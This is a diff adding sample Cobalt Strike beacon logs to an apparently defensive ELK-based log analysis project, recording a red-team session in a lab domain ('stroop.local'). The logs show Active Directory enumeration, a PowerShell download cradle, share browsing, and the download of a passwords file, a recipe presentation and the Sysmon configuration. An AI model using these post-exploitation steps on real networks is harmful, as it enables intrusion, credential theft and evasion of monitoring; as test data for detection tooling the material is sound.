unknown + s-lin108 unknown + s-lin109 unknown + s-lin110 unknown + s-lin111 unknown + s-lin112 unknown + s-lin113 unknown + s-lin114 unknown + s-lin115 unknown + s-lin116 unknown + s-lin117 unknown + s-lin118 unknown + s-lin119 unknown + s-lin120 unknown + s-lin121 unknown + s-lin122 unknown + s-lin123 unknown + s-lin124 unknown + s-lin125 unknown + s-lin126 unknown + s-lin127 unknown + s-lin128 unknown + s-lin129 unknown + s-lin130 unknown + s-lin131 unknown + s-lin132 unknown + s-lin133 unknown + s-lin134 unknown + s-lin135 unknown + s-lin136 unknown + s-lin137 unknown + s-lin138 unknown + s-lin139 unknown + s-lin140 unknown + s-lin141 unknown + s-lin142 unknown + s-lin143 unknown + s-lin144 unknown + s-lin145 unknown + s-lin146 unknown + s-lin147 unknown + s-lin148 unknown + s-lin149 unknown + s-lin150 unknown + s-lin151 unknown + s-lin152 unknown + s-lin153 unknown + s-lin154 unknown + s-lin155 unknown + s-lin156 unknown + s-lin157 unknown + s-lin158 unknown + s-lin159 unknown + s-lin160 unknown + s-lin161 unknown + s-lin162 unknown + s-lin163 unknown + s-lin164 unknown + s-lin165 unknown + s-lin166 unknown + s-lin167 unknown + s-lin168 unknown + s-lin169 unknown + s-lin170 unknown + s-lin171 unknown + s-lin172 unknown + s-lin173 unknown + s-lin174 unknown + s-lin175 unknown + s-lin176 unknown + s-lin177 unknown + s-lin178 unknown + s-lin179 unknown + s-lin180 unknown + s-lin181 unknown + s-lin182 unknown + s-lin183 unknown + s-lin184 unknown + s-lin185 unknown + s-lin186 unknown + s-lin187 unknown + s-lin188 unknown + s-lin189 unknown + s-lin190 unknown + s-lin191 unknown + s-lin192 unknown + s-lin193 unknown + s-lin194 unknown + s-lin195 unknown + s-lin196 unknown + s-lin197 unknown + s-lin198 unknown + s-lin199 unknown + s-lin200 unknown + s-lin201 unknown + s-lin202 unknown + s-lin203 unknown + s-lin204 unknown + s-lin205 unknown + s-lin206 unknown + s-lin207 unknown + s-lin208 unknown + s-lin209 unknown + s-lin210 unknown + s-lin211 unknown + s-lin212 unknown + s-lin213 unknown + s-lin214 unknown + s-lin215 unknown + s-lin216 unknown + s-lin217 unknown + s-lin218 unknown + s-lin219 unknown + s-lin220 unknown + s-lin221 unknown + s-lin222 unknown + s-lin223 unknown + s-lin224 unknown + s-lin225 unknown + s-lin226 unknown + s-lin227 unknown + s-lin228 unknown + s-lin229 unknown + s-lin230 unknown + s-lin231 unknown + s-lin232 unknown + s-lin233 unknown + s-lin234 unknown + s-lin235 unknown + s-lin236 unknown + s-lin237 unknown + s-lin238 unknown + s-lin239 unknown + s-lin240 unknown + s-lin241 unknown + s-lin242 unknown + s-lin243 unknown + s-lin244 unknown + s-lin245 unknown + s-lin246 unknown + s-lin247 unknown + s-lin248 unknown + s-lin249 unknown + s-lin250 unknown + s-lin251 unknown + s-lin252 unknown + s-lin253 unknown + s-lin254 unknown + s-lin255 unknown + s-lin256 unknown + s-lin257 unknown + s-lin258 unknown + s-lin259 unknown + s-lin260 unknown + s-lin261 unknown + s-lin262 unknown + s-lin263 unknown + s-lin264 unknown + s-lin265 unknown + s-lin266 unknown + s-lin267 unknown + s-lin268 unknown + s-lin269 unknown + s-lin270 unknown + s-lin271 unknown + s-lin272 unknown + s-lin273 unknown + s-lin274 unknown + s-lin275 unknown + s-lin276 unknown + s-lin277 unknown + s-lin278 unknown + s-lin279 unknown + s-lin280 unknown + s-lin281 unknown + s-lin282 unknown + s-lin283 unknown + s-lin284 unknown + s-lin285 unknown + s-lin286 unknown + s-lin287 unknown + s-lin288 unknown + s-lin289 unknown + s-lin290 unknown + s-lin291 unknown + s-lin292 unknown + s-lin293 unknown + s-lin294 unknown + s-lin295 unknown + s-lin296 unknown + s-lin297 unknown + s-lin298 unknown + s-lin299 unknown + s-lin300 unknown + pcd-100 unknown + pcd-101 unknown + pcd-102 unknown + pcd-103 unknown + pcd-104 unknown + pcd-105 unknown + pcd-106 unknown + pcd-107 unknown + pcd-108 unknown + pcd-109 unknown + pcd-110 unknown + pcd-111 unknown + pcd-112 unknown + pcd-113 unknown + pcd-114 unknown + pcd-115 unknown + pcd-116 unknown + pcd-117 unknown + pcd-118 unknown + pcd-119 unknown + pcd-120 unknown + pcd-121 unknown + S-WIN43 10.1.2.13 + S-WIN44 10.1.2.14 + L-WIN223 10.1.3.10 + L-WIN224 10.1.3.11 + L-WIN225 10.1.3.12 + L-WIN226 10.1.3.13 + L-WIN227 10.1.4.10 + L-WIN228 10.1.4.11 + S-WIN45 10.2.1.20 + + +03/30 08:48:32 UTC [input] powreshell get-domaincomputer +03/30 08:48:32 UTC [error] Unknown command: powreshell get-domaincomputer +03/30 08:48:37 UTC [input] powershell get-domaincomputer +03/30 08:48:37 UTC [task] Tasked beacon to run: get-domaincomputer +03/30 08:48:38 UTC [checkin] host called home, sent: 321 bytes +03/30 08:48:40 UTC [output] +received output: +#< CLIXML +System.Management.Automation.PSCustomObjectSystem.Object1Preparing modules for first use.0-1-1Completed-1 1Preparing modules for first use.0-1-1Completed-1 get-domaincomputer : The term 'get-domaincomputer' is not recognized as the name of a cmdlet, function, script file, _x000D__x000A_or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and _x000D__x000A_try again._x000D__x000A_At line:1 char:75_x000D__x000A_+ ... client).DownloadString('http://127.0.0.1:26388/'); get-domaincomputer_x000D__x000A_+ ~~~~~~~~~~~~~~~~~~_x000D__x000A_ + CategoryInfo : ObjectNotFound: (get-domaincomputer:String) [], CommandNotFoundException_x000D__x000A_ + FullyQualifiedErrorId : CommandNotFoundException_x000D__x000A_ _x000D__x000A_ + +03/30 08:49:26 UTC [input] powershell get-netcomputer +03/30 08:49:26 UTC [task] Tasked beacon to run: get-netcomputer +03/30 08:49:27 UTC [checkin] host called home, sent: 313 bytes +03/30 08:49:29 UTC [output] +received output: +#< CLIXML +S-WIN22.stroop.local +S-WIN21.stroop.local +S-WIN43.stroop.local +S-WIN44.stroop.local +L-WIN223.stroop.local +L-WIN224.stroop.local +L-WIN225.stroop.local +L-WIN226.stroop.local +L-WIN227.stroop.local +L-WIN228.stroop.local +S-WIN45.stroop.local +System.Management.Automation.PSCustomObjectSystem.Object1Preparing modules for first use.0-1-1Completed-1 + +03/30 08:49:38 UTC [input] powershell get-netcomputer -fulldata +03/30 08:49:38 UTC [task] Tasked beacon to run: get-netcomputer -fulldata +03/30 08:49:38 UTC [checkin] host called home, sent: 337 bytes +03/30 08:49:40 UTC [output] +received output: +#< CLIXML + + +logoncount : 14 +msds-generationid : {116, 93, 120, 30...} +serverreferencebl : CN=S-WIN22,CN=Servers,CN=FactoryNL,CN=Sites,CN=Configuration,DC=stroop,DC=local +iscriticalsystemobject : True +distinguishedname : CN=S-WIN22,OU=Domain Controllers,DC=stroop,DC=local +objectclass : {top, person, organizationalPerson, user...} +lastlogontimestamp : 3/29/2020 10:39:08 AM +name : S-WIN22 +objectsid : S-1-5-21-2163199188-2306780613-1636707950-4887 +samaccountname : S-WIN22$ +localpolicyflags : 0 +codepage : 0 +samaccounttype : 805306369 +whenchanged : 3/29/2020 10:45:35 AM +countrycode : 0 +cn : S-WIN22 +accountexpires : 9223372036854775807 +adspath : LDAP://CN=S-WIN22,OU=Domain Controllers,DC=stroop,DC=local +instancetype : 4 +msdfsr-computerreferencebl : CN=S-WIN22,CN=Topology,CN=Domain System + Volume,CN=DFSR-GlobalSettings,CN=System,DC=stroop,DC=local +objectguid : 739b8d8a-66db-4d1f-accb-3b54c02be81f +operatingsystem : Windows Server 2012 R2 Datacenter +operatingsystemversion : 6.3 (9600) +objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=stroop,DC=local +dscorepropagationdata : 1/1/1601 12:00:00 AM +serviceprincipalname : {DNS/S-WIN22.stroop.local, HOST/S-WIN22.stroop.local/STROOP, + RPC/74e70e8d-7d61-4bdc-a817-63fa62eb73b2._msdcs.stroop.local, + GC/S-WIN22.stroop.local/stroop.local...} +usncreated : 8042 +lastlogon : 3/30/2020 7:51:46 AM +useraccountcontrol : 532480 +whencreated : 3/29/2020 10:39:08 AM +primarygroupid : 516 +pwdlastset : 3/29/2020 10:39:08 AM +msds-supportedencryptiontypes : 28 +usnchanged : 28707 +ridsetreferences : CN=RID Set,CN=S-WIN22,OU=Domain Controllers,DC=stroop,DC=local +dnshostname : S-WIN22.stroop.local + +serverreferencebl : CN=S-WIN21,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=stroop,DC + =local +iscriticalsystemobject : True +distinguishedname : CN=S-WIN21,OU=Domain Controllers,DC=stroop,DC=local +objectclass : {top, person, organizationalPerson, user...} +lastlogontimestamp : 3/29/2020 9:54:48 AM +name : S-WIN21 +objectsid : S-1-5-21-2163199188-2306780613-1636707950-1001 +samaccountname : S-WIN21$ +localpolicyflags : 0 +codepage : 0 +samaccounttype : 805306369 +whenchanged : 3/29/2020 10:39:20 AM +countrycode : 0 +cn : S-WIN21 +accountexpires : 9223372036854775807 +adspath : LDAP://CN=S-WIN21,OU=Domain Controllers,DC=stroop,DC=local +instancetype : 4 +msdfsr-computerreferencebl : CN=S-WIN21,CN=Topology,CN=Domain System + Volume,CN=DFSR-GlobalSettings,CN=System,DC=stroop,DC=local +objectguid : 2f094ab8-be92-40b1-aa06-63512f213122 +operatingsystem : Windows Server 2012 R2 Datacenter +operatingsystemversion : 6.3 (9600) +objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=stroop,DC=local +dscorepropagationdata : 1/1/1601 12:00:00 AM +serviceprincipalname : {Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/S-WIN21.stroop.local, + ldap/S-WIN21.stroop.local/ForestDnsZones.stroop.local, + ldap/S-WIN21.stroop.local/DomainDnsZones.stroop.local, TERMSRV/S-WIN21...} +usncreated : 8029 +useraccountcontrol : 532480 +whencreated : 3/29/2020 9:54:08 AM +primarygroupid : 516 +pwdlastset : 3/29/2020 9:54:24 AM +msds-supportedencryptiontypes : 28 +usnchanged : 8029 +ridsetreferences : CN=RID Set,CN=S-WIN21,OU=Domain Controllers,DC=stroop,DC=local +dnshostname : S-WIN21.stroop.local + +iscriticalsystemobject : False +distinguishedname : CN=S-WIN43,OU=Servers,OU=Office,OU=Systems,DC=stroop,DC=local +objectclass : {top, person, organizationalPerson, user...} +lastlogontimestamp : 3/29/2020 10:12:41 AM +name : S-WIN43 +objectsid : S-1-5-21-2163199188-2306780613-1636707950-4879 +samaccountname : S-WIN43$ +localpolicyflags : 0 +codepage : 0 +samaccounttype : 805306369 +whenchanged : 3/29/2020 10:39:40 AM +countrycode : 0 +cn : S-WIN43 +accountexpires : 9223372036854775807 +adspath : LDAP://CN=S-WIN43,OU=Servers,OU=Office,OU=Systems,DC=stroop,DC=local +instancetype : 4 +usncreated : 20814 +objectguid : 20a22808-5fb5-4f65-b2cf-591028941467 +operatingsystem : Windows Server 2012 R2 Datacenter +operatingsystemversion : 6.3 (9600) +objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=stroop,DC=local +dscorepropagationdata : 1/1/1601 12:00:00 AM +serviceprincipalname : {TERMSRV/S-WIN43, TERMSRV/S-WIN43.stroop.local, WSMAN/S-WIN43, + WSMAN/S-WIN43.stroop.local...} +useraccountcontrol : 4096 +whencreated : 3/29/2020 10:12:40 AM +primarygroupid : 515 +pwdlastset : 3/29/2020 10:12:40 AM +msds-supportedencryptiontypes : 28 +usnchanged : 20814 +dnshostname : S-WIN43.stroop.local + +iscriticalsystemobject : False +distinguishedname : CN=S-WIN44,OU=Servers,OU=Office,OU=Systems,DC=stroop,DC=local +objectclass : {top, person, organizationalPerson, user...} +lastlogontimestamp : 3/29/2020 10:15:40 AM +name : S-WIN44 +objectsid : S-1-5-21-2163199188-2306780613-1636707950-4880 +samaccountname : S-WIN44$ +localpolicyflags : 0 +codepage : 0 +samaccounttype : 805306369 +whenchanged : 3/29/2020 10:39:40 AM +countrycode : 0 +cn : S-WIN44 +accountexpires : 9223372036854775807 +adspath : LDAP://CN=S-WIN44,OU=Servers,OU=Office,OU=Systems,DC=stroop,DC=local +instancetype : 4 +usncreated : 20816 +objectguid : 66124476-67bb-42c7-984e-49207ad97de4 +operatingsystem : Windows Server 2016 Datacenter +operatingsystemversion : 10.0 (14393) +objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=stroop,DC=local +dscorepropagationdata : 1/1/1601 12:00:00 AM +serviceprincipalname : {WSMAN/S-WIN44, WSMAN/S-WIN44.stroop.local, TERMSRV/S-WIN44, + TERMSRV/S-WIN44.stroop.local...} +memberof : CN=Event Log Readers,CN=Builtin,DC=stroop,DC=local +useraccountcontrol : 4096 +whencreated : 3/29/2020 10:15:40 AM +primarygroupid : 515 +pwdlastset : 3/29/2020 10:15:40 AM +msds-supportedencryptiontypes : 28 +usnchanged : 20816 +dnshostname : S-WIN44.stroop.local + +logoncount : 11 +iscriticalsystemobject : False +distinguishedname : CN=L-WIN223,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local +objectclass : {top, person, organizationalPerson, user...} +lastlogontimestamp : 3/29/2020 10:18:00 AM +objectsid : S-1-5-21-2163199188-2306780613-1636707950-4881 +samaccountname : L-WIN223$ +localpolicyflags : 0 +codepage : 0 +samaccounttype : 805306369 +whenchanged : 3/29/2020 10:39:40 AM +countrycode : 0 +cn : L-WIN223 +accountexpires : 9223372036854775807 +adspath : LDAP://CN=L-WIN223,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local +instancetype : 4 +usncreated : 20818 +objectguid : 1878f205-7905-4b97-814e-990c3d8a9909 +operatingsystem : Windows 10 Enterprise LTSC +operatingsystemversion : 10.0 (17763) +objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=stroop,DC=local +dscorepropagationdata : 1/1/1601 12:00:00 AM +serviceprincipalname : {WSMAN/L-WIN223, WSMAN/L-WIN223.stroop.local, TERMSRV/L-WIN223, + TERMSRV/L-WIN223.stroop.local...} +lastlogon : 3/30/2020 8:40:35 AM +usnchanged : 20818 +useraccountcontrol : 4096 +whencreated : 3/29/2020 10:18:00 AM +primarygroupid : 515 +pwdlastset : 3/29/2020 10:18:00 AM +msds-supportedencryptiontypes : 28 +name : L-WIN223 +dnshostname : L-WIN223.stroop.local + +logoncount : 5 +iscriticalsystemobject : False +description : Workstation of w.trommel +distinguishedname : CN=L-WIN224,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local +objectclass : {top, person, organizationalPerson, user...} +lastlogontimestamp : 3/29/2020 10:20:19 AM +name : L-WIN224 +objectsid : S-1-5-21-2163199188-2306780613-1636707950-4882 +samaccountname : L-WIN224$ +localpolicyflags : 0 +codepage : 0 +samaccounttype : 805306369 +whenchanged : 3/29/2020 11:30:05 AM +countrycode : 0 +cn : L-WIN224 +accountexpires : 9223372036854775807 +adspath : LDAP://CN=L-WIN224,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local +instancetype : 4 +usncreated : 20820 +objectguid : 4413516a-6c9d-4c02-897c-dfa11d70ebf6 +operatingsystem : Windows 10 Enterprise LTSC +operatingsystemversion : 10.0 (17763) +objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=stroop,DC=local +dscorepropagationdata : 1/1/1601 12:00:00 AM +serviceprincipalname : {WSMAN/L-WIN224, WSMAN/L-WIN224.stroop.local, TERMSRV/L-WIN224, + TERMSRV/L-WIN224.stroop.local...} +lastlogon : 3/30/2020 8:36:46 AM +useraccountcontrol : 4096 +whencreated : 3/29/2020 10:20:19 AM +primarygroupid : 515 +pwdlastset : 3/29/2020 10:20:19 AM +msds-supportedencryptiontypes : 28 +usnchanged : 30980 +dnshostname : L-WIN224.stroop.local + +logoncount : 1 +iscriticalsystemobject : False +distinguishedname : CN=L-WIN225,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local +objectclass : {top, person, organizationalPerson, user...} +lastlogontimestamp : 3/29/2020 10:22:39 AM +objectsid : S-1-5-21-2163199188-2306780613-1636707950-4883 +samaccountname : L-WIN225$ +localpolicyflags : 0 +codepage : 0 +samaccounttype : 805306369 +whenchanged : 3/29/2020 10:39:40 AM +countrycode : 0 +cn : L-WIN225 +accountexpires : 9223372036854775807 +adspath : LDAP://CN=L-WIN225,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local +instancetype : 4 +usncreated : 20822 +objectguid : 7dec6123-03bf-42f9-b65a-5afdcdddb997 +operatingsystem : Windows 10 Enterprise LTSC +operatingsystemversion : 10.0 (17763) +objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=stroop,DC=local +dscorepropagationdata : 1/1/1601 12:00:00 AM +serviceprincipalname : {WSMAN/L-WIN225, WSMAN/L-WIN225.stroop.local, TERMSRV/L-WIN225, + TERMSRV/L-WIN225.stroop.local...} +lastlogon : 3/30/2020 8:43:44 AM +usnchanged : 20822 +useraccountcontrol : 4096 +whencreated : 3/29/2020 10:22:39 AM +primarygroupid : 515 +pwdlastset : 3/29/2020 10:22:39 AM +msds-supportedencryptiontypes : 28 +name : L-WIN225 +dnshostname : L-WIN225.stroop.local + +iscriticalsystemobject : False +distinguishedname : CN=L-WIN226,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local +objectclass : {top, person, organizationalPerson, user...} +lastlogontimestamp : 3/29/2020 10:24:59 AM +name : L-WIN226 +objectsid : S-1-5-21-2163199188-2306780613-1636707950-4884 +samaccountname : L-WIN226$ +localpolicyflags : 0 +codepage : 0 +samaccounttype : 805306369 +whenchanged : 3/29/2020 10:39:40 AM +countrycode : 0 +cn : L-WIN226 +accountexpires : 9223372036854775807 +adspath : LDAP://CN=L-WIN226,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local +instancetype : 4 +usncreated : 20824 +objectguid : 34bdae43-1ba1-45ee-a3cf-ab25e6f9cd30 +operatingsystem : Windows 10 Enterprise LTSC +operatingsystemversion : 10.0 (17763) +objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=stroop,DC=local +dscorepropagationdata : 1/1/1601 12:00:00 AM +serviceprincipalname : {WSMAN/L-WIN226, WSMAN/L-WIN226.stroop.local, TERMSRV/L-WIN226, + TERMSRV/L-WIN226.stroop.local...} +useraccountcontrol : 4096 +whencreated : 3/29/2020 10:24:59 AM +primarygroupid : 515 +pwdlastset : 3/29/2020 10:24:59 AM +msds-supportedencryptiontypes : 28 +usnchanged : 20824 +dnshostname : L-WIN226.stroop.local + +logoncount : 8 +iscriticalsystemobject : False +description : ADMIN workstation of ADMIN-w.trommel +distinguishedname : CN=L-WIN227,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local +objectclass : {top, person, organizationalPerson, user...} +lastlogontimestamp : 3/29/2020 10:27:16 AM +name : L-WIN227 +objectsid : S-1-5-21-2163199188-2306780613-1636707950-4885 +samaccountname : L-WIN227$ +localpolicyflags : 0 +codepage : 0 +samaccounttype : 805306369 +whenchanged : 3/29/2020 11:30:05 AM +countrycode : 0 +cn : L-WIN227 +accountexpires : 9223372036854775807 +adspath : LDAP://CN=L-WIN227,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local +instancetype : 4 +usncreated : 20826 +objectguid : 6199a74b-c55c-4b13-8c10-9adc295d646a +operatingsystem : Windows 10 Enterprise LTSC +operatingsystemversion : 10.0 (17763) +objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=stroop,DC=local +dscorepropagationdata : 1/1/1601 12:00:00 AM +serviceprincipalname : {WSMAN/L-WIN227, WSMAN/L-WIN227.stroop.local, TERMSRV/L-WIN227, + TERMSRV/L-WIN227.stroop.local...} +lastlogon : 3/30/2020 7:46:16 AM +useraccountcontrol : 4096 +whencreated : 3/29/2020 10:27:16 AM +primarygroupid : 515 +pwdlastset : 3/29/2020 10:27:16 AM +msds-supportedencryptiontypes : 28 +usnchanged : 30968 +dnshostname : L-WIN227.stroop.local + +logoncount : 3 +iscriticalsystemobject : False +description : ADMIN workstation of ADMIN-a.kool +distinguishedname : CN=L-WIN228,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local +objectclass : {top, person, organizationalPerson, user...} +lastlogontimestamp : 3/29/2020 10:29:36 AM +name : L-WIN228 +objectsid : S-1-5-21-2163199188-2306780613-1636707950-4886 +samaccountname : L-WIN228$ +localpolicyflags : 0 +codepage : 0 +samaccounttype : 805306369 +whenchanged : 3/29/2020 11:30:05 AM +countrycode : 0 +cn : L-WIN228 +accountexpires : 9223372036854775807 +adspath : LDAP://CN=L-WIN228,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local +instancetype : 4 +usncreated : 20828 +objectguid : e960b9ef-6f1e-40dd-82fd-129e0ad7b5a2 +operatingsystem : Windows 10 Enterprise LTSC +operatingsystemversion : 10.0 (17763) +objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=stroop,DC=local +dscorepropagationdata : 1/1/1601 12:00:00 AM +serviceprincipalname : {WSMAN/L-WIN228, WSMAN/L-WIN228.stroop.local, TERMSRV/L-WIN228, + TERMSRV/L-WIN228.stroop.local...} +lastlogon : 3/30/2020 8:11:41 AM +useraccountcontrol : 4096 +whencreated : 3/29/2020 10:29:35 AM +primarygroupid : 515 +pwdlastset : 3/29/2020 10:29:35 AM +msds-supportedencryptiontypes : 28 +usnchanged : 30979 +dnshostname : L-WIN228.stroop.local + +logoncount : 16 +badpasswordtime : 1/1/1601 12:00:00 AM +description : Steppingstone to s-lin99 (Main factory and recipe controller) +distinguishedname : CN=S-WIN45,OU=Factory,OU=Systems,DC=stroop,DC=local +objectclass : {top, person, organizationalPerson, user...} +lastlogontimestamp : 3/29/2020 10:50:59 AM +name : S-WIN45 +objectsid : S-1-5-21-2163199188-2306780613-1636707950-5602 +samaccountname : S-WIN45$ +localpolicyflags : 0 +lastlogon : 3/30/2020 8:33:47 AM +codepage : 0 +samaccounttype : 805306369 +whenchanged : 3/29/2020 11:30:05 AM +accountexpires : 9223372036854775807 +countrycode : 0 +adspath : LDAP://CN=S-WIN45,OU=Factory,OU=Systems,DC=stroop,DC=local +instancetype : 4 +operatingsystem : Windows Server 2012 R2 Datacenter +objectguid : b358eff4-301e-4bed-a9cf-00c12602e854 +operatingsystemversion : 6.3 (9600) +lastlogoff : 1/1/1601 12:00:00 AM +objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=stroop,DC=local +dscorepropagationdata : 1/1/1601 12:00:00 AM +serviceprincipalname : {TERMSRV/S-WIN45, TERMSRV/S-WIN45.stroop.local, WSMAN/S-WIN45, + WSMAN/S-WIN45.stroop.local...} +whencreated : 3/29/2020 10:50:58 AM +iscriticalsystemobject : False +badpwdcount : 0 +cn : S-WIN45 +useraccountcontrol : 4096 +usncreated : 28793 +primarygroupid : 515 +pwdlastset : 3/29/2020 10:50:58 AM +msds-supportedencryptiontypes : 28 +usnchanged : 30969 +dnshostname : S-WIN45.stroop.local + + + +System.Management.Automation.PSCustomObjectSystem.Object1Preparing modules for first use.0-1-1Completed-1 + +03/30 09:22:04 UTC [input] sleep 60 +03/30 09:22:04 UTC [task] Tasked beacon to sleep for 60s +03/30 09:22:05 UTC [checkin] host called home, sent: 16 bytes +03/30 09:23:14 UTC [input] sleep 5 +03/30 09:23:14 UTC [task] Tasked beacon to sleep for 5s +03/30 09:24:06 UTC [checkin] host called home, sent: 16 bytes +03/30 09:29:44 UTC [input] shell net use +03/30 09:29:44 UTC [task] Tasked beacon to run: net use +03/30 09:29:48 UTC [checkin] host called home, sent: 38 bytes +03/30 09:29:48 UTC [output] +received output: +New connections will be remembered. + + +Status Local Remote Network + +------------------------------------------------------------------------------- +OK H: \\S-win43\UserHome$\W.Tax Microsoft Windows Network +The command completed successfully. + + + +03/30 09:29:56 UTC [input] dir \\s-win43\ +03/30 09:29:56 UTC [error] Unknown command: dir \\s-win43\ +03/30 09:29:59 UTC [input] shell dir \\s-win43\ +03/30 09:29:59 UTC [task] Tasked beacon to run: dir \\s-win43\ +03/30 09:30:03 UTC [checkin] host called home, sent: 45 bytes +03/30 09:30:03 UTC [output] +received output: +The specified path is invalid. + + +03/30 09:30:13 UTC [input] shell dir \\s-win43.stroop.local\ +03/30 09:30:13 UTC [task] Tasked beacon to run: dir \\s-win43.stroop.local\ +03/30 09:30:13 UTC [checkin] host called home, sent: 58 bytes +03/30 09:30:13 UTC [output] +received output: +The specified path is invalid. + + +03/30 09:30:33 UTC [checkin] host called home, sent: 31 bytes +03/30 09:30:44 UTC [checkin] host called home, sent: 20 bytes +03/30 09:30:50 UTC [input] download H:\RecipeTeammeeting_Apr1_newrecipes.pptx +03/30 09:30:50 UTC [task] Tasked beacon to download H:\RecipeTeammeeting_Apr1_newrecipes.pptx +03/30 09:30:54 UTC [checkin] host called home, sent: 49 bytes +03/30 09:30:54 UTC [output] +started download of H:\RecipeTeammeeting_Apr1_newrecipes.pptx (1056424 bytes) + +03/30 09:30:57 UTC [input] download H:\passwords.txt.txt +03/30 09:30:57 UTC [task] Tasked beacon to download H:\passwords.txt.txt +03/30 09:30:59 UTC [checkin] host called home, sent: 28 bytes +03/30 09:30:59 UTC [output] +started download of H:\passwords.txt.txt (114 bytes) + +03/30 09:30:59 UTC [output] +download of passwords.txt.txt is complete + +03/30 09:31:04 UTC [output] +download of RecipeTeammeeting_Apr1_newrecipes.pptx is complete + +03/30 09:31:09 UTC [checkin] host called home, sent: 27 bytes +03/30 09:31:09 UTC [error] could not open \\s-win43\*: 67 +03/30 09:33:25 UTC [input] shell net view \\s-win43 +03/30 09:33:25 UTC [task] Tasked beacon to run: net view \\s-win43 +03/30 09:33:25 UTC [checkin] host called home, sent: 49 bytes +03/30 09:33:25 UTC [output] +received output: +Shared resources at \\s-win43 + + + +Share name Type Used as Comment + +------------------------------------------------------------------------------- +DepartmentShares Disk +Software Disk +The command completed successfully. + + + +03/30 09:33:41 UTC [input] shell dir \\s-win43\DepartmentShares +03/30 09:33:41 UTC [task] Tasked beacon to run: dir \\s-win43\DepartmentShares +03/30 09:33:46 UTC [checkin] host called home, sent: 61 bytes +03/30 09:33:46 UTC [output] +received output: + Volume in drive \\s-win43\DepartmentShares is Windows + Volume Serial Number is BA06-AED5 + + Directory of \\s-win43\DepartmentShares + +03/29/2020 10:53 AM . +03/29/2020 10:53 AM .. +03/29/2020 10:53 AM FinanceDept +03/29/2020 10:53 AM HRDept +03/29/2020 10:53 AM ITDept +03/29/2020 10:53 AM LogisticsDept +03/29/2020 10:53 AM MngtBoard +03/29/2020 10:53 AM RiskDept +03/29/2020 11:03 AM Software + 0 File(s) 0 bytes + 9 Dir(s) 106,498,801,664 bytes free + + +03/30 09:33:55 UTC [input] shell dir \\s-win43\Software +03/30 09:33:55 UTC [task] Tasked beacon to run: dir \\s-win43\Software +03/30 09:33:56 UTC [checkin] host called home, sent: 53 bytes +03/30 09:33:56 UTC [output] +received output: + Volume in drive \\s-win43\Software is Windows + Volume Serial Number is BA06-AED5 + + Directory of \\s-win43\Software + +03/29/2020 11:03 AM . +03/29/2020 11:03 AM .. +03/29/2020 11:03 AM 1,735,168 7zx64.msi +03/29/2020 11:03 AM 4,228,352 BgInfo64.exe +03/29/2020 11:03 AM 60,940,800 chromex64.msi +03/29/2020 11:03 AM 21,368,251 GRR_3.2.2.0_amd64.exe +03/29/2020 11:03 AM 4,336 netcease.ps1 +03/29/2020 11:03 AM 9,981,952 nppx64.msi +03/29/2020 10:57 AM Office16 +03/29/2020 10:57 AM 3,643,833,378 Office16x86.zip +03/29/2020 11:02 AM 3,048,960 puttyx64.msi +03/29/2020 11:02 AM 1,973,624 sysmon64.exe +03/29/2020 11:02 AM 113,354 sysmonconfig-export.xml +03/29/2020 11:03 AM 55,854,864 VSCodeUserSetup-x64-1.40.2.exe + 11 File(s) 3,803,083,039 bytes + 3 Dir(s) 106,498,801,664 bytes free + + +03/30 09:34:16 UTC [checkin] host called home, sent: 36 bytes +03/30 09:34:22 UTC [input] download \\s-win43\Software\sysmonconfig-export.xml +03/30 09:34:22 UTC [task] Tasked beacon to download \\s-win43\Software\sysmonconfig-export.xml +03/30 09:34:26 UTC [checkin] host called home, sent: 50 bytes +03/30 09:34:26 UTC [output] +started download of \\s-win43\Software\sysmonconfig-export.xml (113354 bytes) + +03/30 09:34:26 UTC [output] +download of sysmonconfig-export.xml is complete + +03/30 12:21:48 UTC [input] sleep 60 5 +03/30 12:21:48 UTC [task] Tasked beacon to sleep for 60s (5% jitter) +03/30 12:21:49 UTC [checkin] host called home, sent: 16 bytes diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/beacon_688141424.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/beacon_688141424.log new file mode 100644 index 00000000..52fc5fc4 --- /dev/null +++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/beacon_688141424.log @@ -0,0 +1,896 @@ +03/30 08:13:57 UTC [metadata] 13.81.175.116 <- 10.1.3.10; computer: L-WIN223; user: w.tax; process: mousedrivercontrol.exe; pid: 4208; os: Windows; version: 6.2; beacon arch: x64 (x64) +03/30 08:14:40 UTC [input] ps +03/30 08:14:40 UTC [task] Tasked beacon to list processes +03/30 08:14:44 UTC [checkin] host called home, sent: 12 bytes +03/30 08:14:44 UTC [output] +[System Process] 0 0 +System 0 4 +Registry 4 88 +smss.exe 4 404 +csrss.exe 496 512 +wininit.exe 496 588 +csrss.exe 580 596 +winlogon.exe 580 680 +services.exe 588 688 +lsass.exe 588 728 +svchost.exe 688 836 +fontdrvhost.exe 680 844 +fontdrvhost.exe 588 852 +svchost.exe 688 920 +svchost.exe 688 972 +svchost.exe 688 1012 +LogonUI.exe 680 496 +dwm.exe 680 756 +svchost.exe 688 1040 +svchost.exe 688 1132 